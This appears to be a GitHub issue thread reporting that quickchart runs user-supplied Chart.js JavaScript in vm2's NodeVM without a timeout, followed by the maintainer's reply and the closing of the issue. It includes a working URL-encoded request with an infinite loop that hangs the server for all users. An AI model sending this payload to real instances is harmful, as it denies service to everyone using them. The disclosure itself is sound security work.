quickchart

quickchart copied to clipboard

Evaluation of JS embedded in the chart.js specification is done via NodeVM which doesn't support timeouts: https://github.com/typpo/quickchart/blob/master/lib/charts.js#L133

Due to this it's possible for the evaluation to enter an endless loop which hangs the server (restart of the node process required to make it work again).

For example this request will let the process hang for all users, no charts will be served: http://localhost:3400/chart?c=%7B%0A%20%20type%3A%20%27bar%27%2C%0A%20%20data%3A%20%7B%0A%20%20%20%20labels%3A%20%5B%27Q1%27%2C%20%27Q2%27%2C%20%27Q3%27%2C%20%27Q4%27%5D%2C%0A%20%20%20%20datasets%3A%20%5B%7B%0A%20%20%20%20%20%20label%3A%20%27Users%27%2C%0A%20%20%20%20%20%20data%3A%20%5B50%2C%2060%2C%2070%2C%20180%5D.map((x)%20%3D%3E%20%7Bwhile(true){}%20return%20x%20%7D)%0A%20%20%20%20%7D%2C%20%7B%0A%20%20%20%20%20%20label%3A%20%27Revenue%27%2C%0A%20%20%20%20%20%20data%3A%20%5B100%2C%20200%2C%20300%2C%20400%5D%0A%20%20%20%20%7D%5D%0A%20%20%7D%0A%7D%0A

This can also be used as an effective DOS attack

Hi @flash1293, chart evaluation is subject to the limitations of NodeVM and should only be open to trusted parties. This is noted in the readme:

If you are hosting QuickChart youself, take care not to expose the service to untrusted parties. Because Chart.js configs may contain arbitrary Javascript, it is necessary to properly sandbox your QuickChart instance.

You may choose to sandbox your instance in other ways, but generally it is difficult to secure arbitrary JS execution.

Maybe I missed something but it seems possible to use the VM class instead of the NodeVM class in this case which does support timeouts.

Closing this out again as vm2's timeout won't work on operations in returned objects, which is how this project uses it.